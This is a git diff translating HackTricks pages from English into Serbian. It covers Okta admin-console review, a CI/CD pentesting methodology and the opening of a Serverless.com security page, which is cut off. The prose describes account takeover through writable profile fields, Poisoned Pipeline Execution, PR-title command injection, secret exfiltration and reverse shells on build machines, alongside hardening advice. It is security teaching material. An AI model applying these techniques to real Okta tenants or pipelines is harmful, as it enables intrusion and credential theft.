+Ovde je moguće posmatrati kako se ključne informacije kao što su imena, prezimena, emailovi, korisnička imena... dele između Okta i drugih aplikacija. Ovo je zanimljivo jer ako korisnik može **modifikovati u Okta polje** (kao što je njegovo ime ili email) koje se zatim koristi od strane **spoljne aplikacije** za **identifikaciju** korisnika, insajder bi mogao pokušati da **preuzme druge naloge**.
 
-Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
+Štaviše, u profilu **`User (default)`** iz Okta možete videti **koja polja** svaki **korisnik** ima i koja su **pisiva** od strane korisnika. Ako ne možete videti admin panel, jednostavno idite na **ažuriranje informacija o profilu** i videćete koja polja možete ažurirati (napomena: da biste ažurirali email adresu, moraćete da je verifikujete).
 
 ### Directory Integrations
 
-Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
+Direktorijumi vam omogućavaju da uvezete ljude iz postojećih izvora. Pretpostavljam da ćete ovde videti korisnike uvezene iz drugih direktorijuma.
 
-I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
+Nisam to video, ali pretpostavljam da je zanimljivo otkriti **druge direktorijume koje Okta koristi za uvoz korisnika** tako da ako **kompromitujete taj direktorijum** mogli biste postaviti neke vrednosti atributa u korisnicima kreiranim u Okta i **možda kompromitovati Okta okruženje**.
 
 ### Profile Sources
 
-A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
+Izvor profila je **aplikacija koja deluje kao izvor istine** za atribute korisničkog profila. Korisnik može biti izvor samo iz jedne aplikacije ili direktorijuma u isto vreme.
 
-I haven't seen it, so any information about security and hacking regarding this option is appreciated.
+Nisam to video, tako da su sve informacije o bezbednosti i hakovanju u vezi sa ovom opcijom dobrodošle.
 
 ## Customizations
 
 ### Brands
 
-Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
+Proverite u **Domains** tabu ove sekcije email adrese korišćene za slanje emailova i prilagođeni domen unutar Okta kompanije (što verovatno već znate).
 
-Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
+Štaviše, u **Setting** tabu, ako ste admin, možete "**Use a custom sign-out page**" i postaviti prilagođeni URL.
 
 ### SMS
 
-Nothing interesting here.
+Ovde nema ništa zanimljivo.
 
 ### End-User Dashboard
 
-You can find here applications configured, but we will see the details of those later in a different section.
+Ovde možete pronaći aplikacije koje su konfigurirane, ali ćemo detalje o njima videti kasnije u drugoj sekciji.
 
 ### Other
 
-Interesting setting, but nothing super interesting from a security point of view.
+Zanimljiva podešavanja, ali ništa super zanimljivo iz perspektive bezbednosti.
 
 ## Applications
 
 ### Applications
 
-Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
+Ovde možete pronaći sve **konfigurisane aplikacije** i njihove detalje: Ko ima pristup njima, kako je konfigurisano (SAML, OpenID), URL za prijavu, mapiranja između Okta i aplikacije...
 
-In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
+U **`Sign On`** tabu postoji i polje pod nazivom **`Password reveal`** koje bi omogućilo korisniku da **otkrije svoju lozinku** prilikom provere podešavanja aplikacije. Da biste proverili podešavanja aplikacije iz korisničkog panela, kliknite na 3 tačke:
 
 

 
-And you could see some more details about the app (like the password reveal feature, if it's enabled):
+I mogli biste videti još neke detalje o aplikaciji (kao što je funkcija otkrivanja lozinke, ako je omogućena):
 
 

 
@@ -79,125 +79,121 @@ And you could see some more details about the app (like the password reveal feat
 
 ### Access Certifications
 
-Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
+Koristite Access Certifications za kreiranje revizorskih kampanja kako biste periodično pregledali pristup vaših korisnika resursima i automatski odobrili ili opozvali pristup kada je to potrebno.
 
-I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
+Nisam to video korišćeno, ali pretpostavljam da je iz odbrambene tačke gledišta to lepa funkcija.
 
 ## Security
 
 ### General
 
-- **Security notification emails**: All should be enabled.
-- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
-- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
-- **User enumeration prevention**: Both should be enabled
-  - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
-    - Self-Service Registration
-    - JIT flows with email authentication
-- **Okta ThreatInsight settings**: Log and enforce security based on threat level
+- **Security notification emails**: Sve bi trebalo da budu omogućene.
+- **CAPTCHA integration**: Preporučuje se postavljanje barem nevidljivog reCaptche
+- **Organization Security**: Sve može biti omogućeno i aktivacione email adrese ne bi trebale dugo trajati (7 dana je u redu)
+- **User enumeration prevention**: Obe bi trebale biti omogućene
+- Imajte na umu da User Enumeration Prevention ne stupa na snagu ako su dozvoljeni bilo koji od sledećih uslova (Pogledajte [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) za više informacija):
+- Samostalna registracija
+- JIT tokovi sa email autentifikacijom
+- **Okta ThreatInsight settings**: Zabeležite i primenite bezbednost na osnovu nivoa pretnje
 
 ### HealthInsight
 
-Here is possible to find correctly and **dangerous** configured **settings**.
+Ovde je moguće pronaći ispravno i **opasno** konfigurisane **postavke**.
 
 ### Authenticators
 
-Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
+Ovde možete pronaći sve metode autentifikacije koje korisnik može koristiti: Lozinka, telefon, email, kod, WebAuthn... Klikom na autentifikator lozinke možete videti **politiku lozinke**. Proverite da li je jaka.
 
-In the **Enrollment** tab you can see how the ones that are required or optinal:
+U **Enrollment** tabu možete videti kako su one koje su obavezne ili opcione:
 
 

 
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
+Preporučuje se onemogućavanje telefona. Najjače su verovatno kombinacije lozinke, emaila i WebAuthn.
 
 ### Authentication policies
 
-Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
+Svaka aplikacija ima politiku autentifikacije. Politika autentifikacije proverava da li korisnici koji pokušavaju da se prijave u aplikaciju ispunjavaju određene uslove, i primenjuje zahteve faktora na osnovu tih uslova.
 
-Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
+Ovde možete pronaći **zahteve za pristup svakoj aplikaciji**. Preporučuje se da se zahteva barem lozinka i još jedna metoda za svaku aplikaciju. Ali ako kao napadač pronađete nešto slabije, mogli biste to napasti.
 
 ### Global Session Policy
 
-Here you can find the session policies assigned to different groups. For example:
+Ovde možete pronaći politike sesije dodeljene različitim grupama. Na primer:
 
 

 
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
+Preporučuje se zahtevati MFA, ograničiti trajanje sesije na nekoliko sati, ne čuvati kolačiće sesije preko ekstenzija pretraživača i ograničiti lokaciju i provajdera identiteta (ako je to moguće). Na primer, ako svaki korisnik treba da se prijavi iz određene zemlje, mogli biste dozvoliti samo tu lokaciju.
 
 ### Identity Providers
 
-Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
+Provajderi identiteta (IdP) su usluge koje **upravljaju korisničkim nalozima**. Dodavanje IdP-a u Okta omogućava vašim krajnjim korisnicima da se **samo-registruju** sa vašim prilagođenim aplikacijama prvo autentifikovanjem sa društvenim nalogom ili pametnom karticom.
 
-On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
+Na stranici Provajderi identiteta možete dodati društvene prijave (IdP) i konfigurisati Okta kao provajdera usluga (SP) dodavanjem ulaznog SAML-a. Nakon što dodate IdP, možete postaviti pravila usmeravanja kako biste usmerili korisnike ka IdP-u na osnovu konteksta, kao što su lokacija korisnika, uređaj ili email domena.
 
-**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
+**Ako je bilo koji provajder identiteta konfiguran** iz perspektive napadača i branioca proverite tu konfiguraciju i **da li je izvor zaista pouzdan** jer bi napadač koji ga kompromituje mogao takođe dobiti pristup Okta okruženju.
 
 ### Delegated Authentication
 
-Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
+Delegirana autentifikacija omogućava korisnicima da se prijave u Okta unosom akreditiva za **Active Directory (AD) ili LDAP** server njihove organizacije.
 
-Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
+Ponovo, proverite ovo, jer bi napadač koji kompromituje AD organizacije mogao biti u mogućnosti da pređe na Okta zahvaljujući ovoj postavci.
 
 ### Network
 
-A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
+Mrežna zona je konfigurisiva granica koju možete koristiti da **dodelite ili ograničite pristup računarima i uređajima** u vašoj organizaciji na osnovu **IP adrese** koja traži pristup. Možete definisati mrežnu zonu tako što ćete odrediti jednu ili više pojedinačnih IP adresa, opsega IP adresa ili geografskih lokacija.
 
-After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
+Nakon što definišete jednu ili više mrežnih zona, možete **koristiti ih u Global Session Policies**, **politike autentifikacije**, VPN obaveštenja i **pravila usmeravanja**.
 
-From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
+Iz perspektive napadača zanimljivo je znati koje IP adrese su dozvoljene (i proveriti da li su neke **IP adrese privilegovanije** od drugih). Iz perspektive napadača, ako korisnici treba da pristupaju sa određene IP adrese ili regiona, proverite da li se ova funkcija pravilno koristi.
 
 ### Device Integrations
 
-- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
-  - I haven't seen this used yet. TODO
-- **Notification services**: I haven't seen this used yet. TODO
+- **Endpoint Management**: Upravljanje krajnjim tačkama je uslov koji se može primeniti u politici autentifikacije kako bi se osiguralo da upravljani uređaji imaju pristup aplikaciji.
+- Nisam to još video. TODO
+- **Notification services**: Nisam to još video. TODO
 
 ### API
 
-You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
+Možete kreirati Okta API tokene na ovoj stranici, i videti one koji su **kreirani**, njihove **privilegije**, **vreme isteka** i **Izvorne URL-ove**. Imajte na umu da se API tokeni generišu sa dozvolama korisnika koji je kreirao token i važe samo ako je **korisnik** koji ih je kreirao **aktivan**.
 
-The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
+**Trusted Origins** omogućavaju pristup veb sajtovima koje kontrolišete i kojima verujete da pristupaju vašem Okta okruženju putem Okta API-ja.
 
-There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
+Ne bi trebalo da bude puno API tokena, jer ako ih ima, napadač bi mogao pokušati da im pristupi i koristi ih.
 
 ## Workflow
 
 ### Automations
 
-Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
+Automatizacije vam omogućavaju da kreirate automatske akcije koje se pokreću na osnovu skupa uslova okidača koji se javljaju tokom životnog ciklusa krajnjih korisnika.
 
-For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
+Na primer, uslov bi mogao biti "Neaktivnost korisnika u Okta" ili "Isticanje lozinke korisnika u Okta" i akcija bi mogla biti "Pošaljite email korisniku" ili "Promenite stanje životnog ciklusa korisnika u Okta".
 
 ## Reports
 
 ### Reports
 
-Download logs. They are **sent** to the **email address** of the current account.
+Preuzmite logove. Oni se **šalju** na **email adresu** trenutnog naloga.
 
 ### System Log
 
-Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
+Ovde možete pronaći **logove akcija koje su izvršili korisnici** sa puno detalja kao što su prijava u Okta ili u aplikacije putem Okta.
 
 ### Import Monitoring
 
-This can **import logs from the other platforms** accessed with Okta.
+Ovo može **uvoziti logove iz drugih platformi** kojima se pristupa putem Okta.
 
 ### Rate limits
 
-Check the API rate limits reached.
+Proverite dostignute API limite.
 
 ## Settings
 
 ### Account
 
-Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
+Ovde možete pronaći **opšte informacije** o Okta okruženju, kao što su ime kompanije, adresa, **email kontakt za fakturiranje**, **email kontakt za tehničku podršku** i takođe ko bi trebao primati Okta ažuriranja i koja vrsta Okta ažuriranja.
 
 ### Downloads
 
-Here you can download Okta agents to sync Okta with other technologies.
+Ovde možete preuzeti Okta agente za sinhronizaciju Okta sa drugim tehnologijama.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
index 41899af04..380a58275 100644
--- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
+++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -6,103 +6,99 @@
 
 ## VCS
 
-VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
+VCS označava **Sistem za kontrolu verzija**, ovaj sistem omogućava programerima da **upravljaju svojim izvorni kodom**. Najčešći je **git** i obično ćete pronaći kompanije koje ga koriste na jednoj od sledećih **platformi**:
 
 - Github
 - Gitlab
 - Bitbucket
 - Gitea
-- Cloud providers (they offer their own VCS platforms)
+- Cloud provajderi (oni nude svoje VCS platforme)
 
 ## CI/CD Pipelines
 
-CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
+CI/CD pipelines omogućavaju programerima da **automatizuju izvršenje koda** za različite svrhe, uključujući izgradnju, testiranje i implementaciju aplikacija. Ovi automatizovani radni tokovi se **pokreću specifičnim akcijama**, kao što su push-ovi koda, pull zahtevi ili zakazani zadaci. Oni su korisni za pojednostavljenje procesa od razvoja do produkcije.
 
-However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
+Međutim, ovi sistemi moraju biti **izvršeni negde** i obično sa **privilegovanim akreditivima za implementaciju koda ili pristup osetljivim informacijama**.
 
 ## VCS Pentesting Methodology
 
 > [!NOTE]
-> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
+> Čak i ako neke VCS platforme omogućavaju kreiranje pipelines, u ovoj sekciji ćemo analizirati samo potencijalne napade na kontrolu izvornog koda.
 
-Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
+Platforme koje sadrže izvorni kod vašeg projekta sadrže osetljive informacije i ljudi moraju biti veoma oprezni sa dozvolama dodeljenim unutar ove platforme. Ovo su neki uobičajeni problemi na VCS platformama koje napadač može zloupotrebiti:
 
-- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
-- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
-  - **Register**: Some platforms will just allow external users to create an account.
-  - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
-  - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
-- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
-  - If no secret is in place, the attacker could abuse the webhook of the third party platform
-  - If the secret is in the URL, the same happens and the attacker also have the secret
-- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
-  - Compromise the main branch to **compromise production**.
-  - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
-  - **Compromise the pipeline** (check next section)
+- **Leaking**: Ako vaš kod sadrži leak-ove u commit-ima i napadač može pristupiti repozitorijumu (jer je javan ili jer ima pristup), mogao bi otkriti leak-ove.
+- **Pristup**: Ako napadač može **pristupiti nalogu unutar VCS platforme**, mogao bi dobiti **veću vidljivost i dozvole**.
+- **Registracija**: Neke platforme će samo omogućiti spoljnim korisnicima da kreiraju nalog.
+- **SSO**: Neke platforme neće dozvoliti korisnicima da se registruju, ali će omogućiti svakome da pristupi sa važećim SSO (tako da napadač može koristiti svoj github nalog da uđe, na primer).
+- **Akreditivi**: Korisničko ime+Lozinka, lični tokeni, ssh ključevi, Oauth tokeni, kolačići... postoji nekoliko vrsta tokena koje korisnik može ukrasti da bi na neki način pristupio repozitorijumu.
+- **Webhooks**: VCS platforme omogućavaju generisanje webhooks. Ako nisu **zaštićeni** nevidljivim tajnama, **napadač bi mogao da ih zloupotrebi**.
+- Ako nema tajne, napadač bi mogao zloupotrebiti webhook treće strane
+- Ako je tajna u URL-u, isto se dešava i napadač takođe ima tajnu
+- **Kompromitovanje koda:** Ako zlonameran akter ima neku vrstu **write** pristupa nad repozitorijumima, mogao bi pokušati da **ubaci zlonamerni kod**. Da bi bio uspešan, možda će morati da **obiđe zaštite grana**. Ove akcije se mogu izvesti sa različitim ciljevima na umu:
+- Kompromitovati glavnu granu da bi **kompromitovao produkciju**.
+- Kompromitovati glavnu (ili druge grane) da bi **kompromitovao mašine programera** (jer obično izvršavaju testove, terraform ili druge stvari unutar repozitorijuma na svojim mašinama).
+- **Kompromitovati pipeline** (proverite sledeću sekciju)
 
 ## Pipelines Pentesting Methodology
 
-The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
-These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
+Najčešći način da se definiše pipeline je korišćenjem **CI konfiguracione datoteke smeštene u repozitorijumu** koji pipeline gradi. Ova datoteka opisuje redosled izvršenih poslova, uslove koji utiču na tok i postavke okruženja za izgradnju.\
+Ove datoteke obično imaju dosledno ime i format, na primer — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), i YAML datoteke GitHub Actions smeštene pod .github/workflows. Kada se pokrene, posao pipeline-a **povlači kod** iz odabranog izvora (npr. commit / grana), i **izvodi komande navedene u CI konfiguracionoj datoteci** protiv tog koda.
 
-Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
+Stoga je krajnji cilj napadača da na neki način **kompromituje te konfiguracione datoteke** ili **komande koje izvršavaju**.
 
 ### PPE - Poisoned Pipeline Execution
 
-The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
+Putanja Poisoned Pipeline Execution (PPE) koristi dozvole u SCM repozitorijumu da manipuliše CI pipeline-om i izvrši štetne komande. Korisnici sa potrebnim dozvolama mogu modifikovati CI konfiguracione datoteke ili druge datoteke koje koristi posao pipeline-a da uključe zlonamerne komande. Ovo "otrovava" CI pipeline, što dovodi do izvršenja ovih zlonamernih komandi.
 
-For a malicious actor to be successful performing a PPE attack he needs to be able to:
+Da bi zlonameran akter bio uspešan u izvođenju PPE napada, mora biti u mogućnosti da:
 
-- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
-  - Note that sometimes an **external PR count as "write access"**.
-- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
-  - For this, he might need to be able to **bypass branch protections**.
+- Ima **write pristup VCS platformi**, jer se obično pipelines pokreću kada se izvrši push ili pull zahtev. (Proverite VCS pentesting metodologiju za sažetak načina za dobijanje pristupa).
+- Imajte na umu da ponekad **spoljni PR računa kao "write pristup"**.
+- Čak i ako ima write dozvole, mora biti siguran da može **modifikovati CI konfiguracionu datoteku ili druge datoteke na koje se konfiguracija oslanja**.
+- Za to, možda će morati da bude u mogućnosti da **obiđe zaštite grana**.
 
-There are 3 PPE flavours:
+Postoje 3 vrste PPE:
 
-- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
-- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
-- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
-  - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+- **D-PPE**: **Direktni PPE** napad se dešava kada akter **modifikuje CI konfiguraciju** datoteke koja će biti izvršena.
+- **I-DDE**: **Indirektni PPE** napad se dešava kada akter **modifikuje** **datoteku** na koju se CI konfiguraciona datoteka oslanja (kao što je make datoteka ili terraform konfiguracija).
+- **Javni PPE ili 3PE**: U nekim slučajevima pipelines mogu biti **pokrenuti od strane korisnika koji nemaju write pristup u repozitorijumu** (i koji možda nisu ni deo organizacije) jer mogu poslati PR.
+- **3PE Injekcija komandi**: Obično, CI/CD pipelines će **postaviti promenljive okruženja** sa **informacijama o PR-u**. Ako tu vrednost može kontrolisati napadač (kao što je naslov PR-a) i koristi se na **opasnom mestu** (kao što je izvršavanje **sh komandi**), napadač može **ubaciti komande tamo**.
 
 ### Exploitation Benefits
 
-Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
+Poznavanje 3 vrste za toksičnost pipeline-a, hajde da proverimo šta napadač može dobiti nakon uspešne eksploatacije:
 
-- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
-  - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
-- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
-  - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
-  - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
-  - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
-  - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
-- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+- **Tajne**: Kao što je ranije pomenuto, pipelines zahtevaju **privilegije** za svoje poslove (preuzimanje koda, izgradnja, implementacija...) i te privilegije se obično **dodeljuju u tajnama**. Ove tajne su obično dostupne putem **env promenljivih ili datoteka unutar sistema**. Stoga će napadač uvek pokušati da eksfiltrira što više tajni.
+- U zavisnosti od platforme pipeline-a, napadač **može morati da specificira tajne u konfiguraciji**. To znači da ako napadač ne može da modifikuje CI konfiguracioni pipeline (**I-PPE**, na primer), može **samo eksfiltrirati tajne koje taj pipeline ima**.
+- **Računanje**: Kod se izvršava negde, u zavisnosti od toga gde se izvršava, napadač bi mogao biti u mogućnosti da se dalje preusmeri.
+- **Na lokaciji**: Ako se pipelines izvršavaju na lokaciji, napadač bi mogao završiti u **internoj mreži sa pristupom više resursima**.
+- **Cloud**: Napadač bi mogao pristupiti **drugim mašinama u cloudu**, ali takođe bi mogao **eksfiltrirati** IAM uloge/service accounts **tokena** iz njega da bi dobio **dalji pristup unutar clouda**.
+- **Mašine platforme**: Ponekad će poslovi biti izvršeni unutar **mašina platforme pipelines**, koje obično su unutar clouda sa **nema više pristupa**.
+- **Izaberi to:** Ponekad će **platforma pipelines imati konfigurisanih nekoliko mašina** i ako možete **modifikovati CI konfiguracionu datoteku**, možete **naznačiti gde želite da izvršite zlonamerni kod**. U ovoj situaciji, napadač će verovatno pokrenuti reverznu ljusku na svakoj mogućoj mašini da pokuša da je dalje eksploatiše.
+- **Kompromitovanje produkcije**: Ako ste unutar pipeline-a i konačna verzija se gradi i implementira iz njega, mogli biste **kompromitovati kod koji će na kraju biti pokrenut u produkciji**.
 
 ## More relevant info
 
 ### Tools & CIS Benchmark
 
-- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) je open-source alat za reviziju vašeg softverskog lanca snabdevanja za bezbednosnu usklađenost zasnovan na novom [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). Revizija se fokusira na ceo SDLC proces, gde može otkriti rizike od vremena koda do vremena implementacije.
 
 ### Top 10 CI/CD Security Risk
 
-Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
+Proverite ovaj zanimljiv članak o top 10 CI/CD rizicima prema Cider-u: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
 
 ### Labs
 
-- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
+- Na svakoj platformi koju možete pokrenuti lokalno naći ćete kako da je pokrenete lokalno tako da je možete konfigurisati kako želite da je testirate
 - Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
 
 ### Automatic Tools
 
-- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** je alat za statičku analizu koda za infrastrukturu kao kod.
 
 ## References
 
 - [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
index bf1343702..72d85ad7c 100644
--- a/src/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -1,303 +1,274 @@
-# Serverless.com Security
+# Serverless.com Bezbednost
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-### Organization
+### Organizacija
 
-An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
+**Organizacija** je entitet najvišeg nivoa unutar Serverless Framework ekosistema. Predstavlja **kolektivnu grupu**, kao što su kompanija, odeljenje ili bilo koja velika entitet, koja obuhvata više projekata, timova i aplikacija.
 
-### Team
+### Tim
 
-The **Team** are the users with access inside the organization. Teams help in organizing members based on roles. **`Collaborators`** can view and deploy existing apps, while **`Admins`** can create new apps and manage organization settings.
+**Tim** su korisnici sa pristupom unutar organizacije. Timovi pomažu u organizovanju članova na osnovu uloga. **`Saradnici`** mogu da pregledaju i implementiraju postojeće aplikacije, dok **`Administratori`** mogu da kreiraju nove aplikacije i upravljaju postavkama organizacije.
 
-### Application
+### Aplikacija
 
-An **App** is a logical grouping of related services within an Organization. It represents a complete application composed of multiple serverless services that work together to provide a cohesive functionality.
+**Aplikacija** je logičko grupisanje povezanih usluga unutar Organizacije. Predstavlja kompletnu aplikaciju sastavljenu od više serverless usluga koje rade zajedno kako bi pružile koherentnu funkcionalnost.
 
-### **Services**
-
-A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables.
+### **Usluge**
 
